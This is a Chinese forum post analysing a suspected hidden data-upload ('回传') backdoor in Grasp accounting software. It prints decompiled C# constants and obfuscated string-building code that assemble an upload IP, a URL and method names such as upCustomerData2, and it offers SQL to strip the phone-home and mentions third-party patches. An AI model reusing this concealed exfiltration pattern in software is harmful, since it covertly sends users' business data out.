本帖最后由 ajm 于 2015-1-17 09:32 编辑
近期管家婆回传门爆发,受害群体猛增。还记着使用v3和a8过账时候的锁数据提示吧
新版本回传提示。
明显的回传,有留意的朋友会发现安装iis的主机会有ip连接到上海、成都等地【下面会列出已知的所有回传ip】
旧版本回传提示
恢复前面的账套就又可以了,但是用一段时间又不行了,因为你联网了,回传都有个共同特点。厂家后台不会全部锁数据,他会抽取单据量大的客户来锁,意思是你单据量达到了多少 厂家就开始注意了。
下面列出所有回传ip
- 回传1
- 【upCustomerData2,上传客户的数据】
- namespace CarpaServer.AC
- {
- using System;
- public sealed class Ac_Define
- {
- public const string graspUrl = "www.grasp.com.cn";
- public const string uf = "upCustomerData2";
- public const string vs = "sbrsBPRj4OPwTQk2jKn2gw==";
- public const string wsh = "115.239.210.27";
- }
- }
- 回传2
- 111.111.111.1 w3wp.exe 在每天第一次打开经营历程的时候会出现回滚条迟钝几秒,次ip正在这时同步发送。
- 回传3
- 【upCustomerInfo上传客户信息到最下面的ip】
- 在CarpaServer.Common,systemdefine
- namespace CarpaServer.Common
- {
- using System;
- public sealed class SystemDefine
- {
- public const string baiduUrl = "www.baidu.com";
- public const int BBS_ADD_EXP = 3;
- public const string BBS_DIFF_TAG = "------------------!";
- public const int BBS_REPLY_EXP = 1;
- public const string cstWidth = "1000";
- public const int dbHelperCommandTimeOut = 0x7d0;
- public const int DESKTOP_LIST_COUNT = 6;
- public const string graspNxUrl = "www.grasp.com.cn";
- public const int gridHeigh = 0x300;
- public const int gridWidth = 0x3f2;
- public const int MaxDetailCount = 500;
- public const int MAXIDLESECOND = 180;
- public const int pagerNumericCount = 5;
- public const string PosGuid = "e1899e3e-5cb3-4001-9478-84282a812d0b";
- public const int reportGridHeight = 460;
- public const int sysInputCount = 30;
- public const string SYSTEM_EDITION = "9.4";
- public const string SYSTEM_MEDITION = "";
- public const string SYSTEM_PUBDATE = "2014-09-25";
- public const string SYSTEM_VALIDNUMBER = "910";
- public const string ufNx = "upCustomerInfo";
- public const string vsNx = "NxsBrsBPRj4OPwTQk2jKn2gwbwexeTxneu";
- public const string wshNx = "115.239.210.27";
- public static string FULL_VERSION
- {
- get
- {
- return string.Format(string.Format("{0}-{1}", "9.4", "2014-09-25".Replace('-', '.')), new object[0]);
- }
- }
- }
- }
- 回传4
- 【间接调用数据库SysData.wsd,里面的ip进行触发回传】
- namespace CarpaServer.Commission
- {
- using CarpaServer;
- using System;
- public class Commission_AtpGsx
- {
- public static string dtype = string.Format("{0}{1} {2}", AppUtils.productName, "9.4", string.IsNullOrEmpty("910") ? "" : "TOP");
- public static string gwsip = string.Format("{0}{1}{2}{3}{4}{5}{6}", new object[] { Convert.ToString(0xdf), ".", Convert.ToString(4), ".", Convert.ToString(0x74), ".", Convert.ToString(0x16) });
- public static string mstr = string.Format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}", new object[] { "s", "br", "s", "BP", "Rj", "4", "OP", "wT", "Qk", "2j", "Kn2", "gw", "=", "=" });
- public static string uf = string.Format("{0}{1}{2}{3}{4}{5}{6}{7}", new object[] { "u", "p", "C", "ust", "ome", "rD", "ata", "2" });
- public static bool isCompared()
- {
- return (("115.1.210.17" != SysData.wsd) || ("2.239.210.27" == gwsip));
- }
- public static string rUrl()
- {
- return string.Format("{0}{1}{2}{3}{4}{5}{6}{7}{8}{9}{10}{11}{12}{13}{14}{15}", new object[] { "ht", "1p", ":", "/", "/", SysData.wsd, "/1", "rasp", "W", "ebSer", "ver/G", "W", "S", ".", "as", "mx" });
- }
- public static string[] userData()
- {
- return AppUtils.uData();
- }
- }
- }
这些都是总所周知的
管家婆所有分销B、S系列数据库去回传sql语句.rar
(490 Bytes, 下载次数: 198)
送一个去数据库回传的执行语句。
回传实在可恶,看了这些,知道用分销的风险了吧,我观察 目前网上发布的补丁,99%都只去掉了表面上的125.69.76.115和www.grasp.com.cn 这2个地址【我的除外】,所以大家要小心选择补丁提供方。
然后大家觉得厂家是否该留后门,做一个讨论吧。
|
[复制链接]
发表于 2014-12-21 12:08:15
发表于 2014-12-21 12:21:45
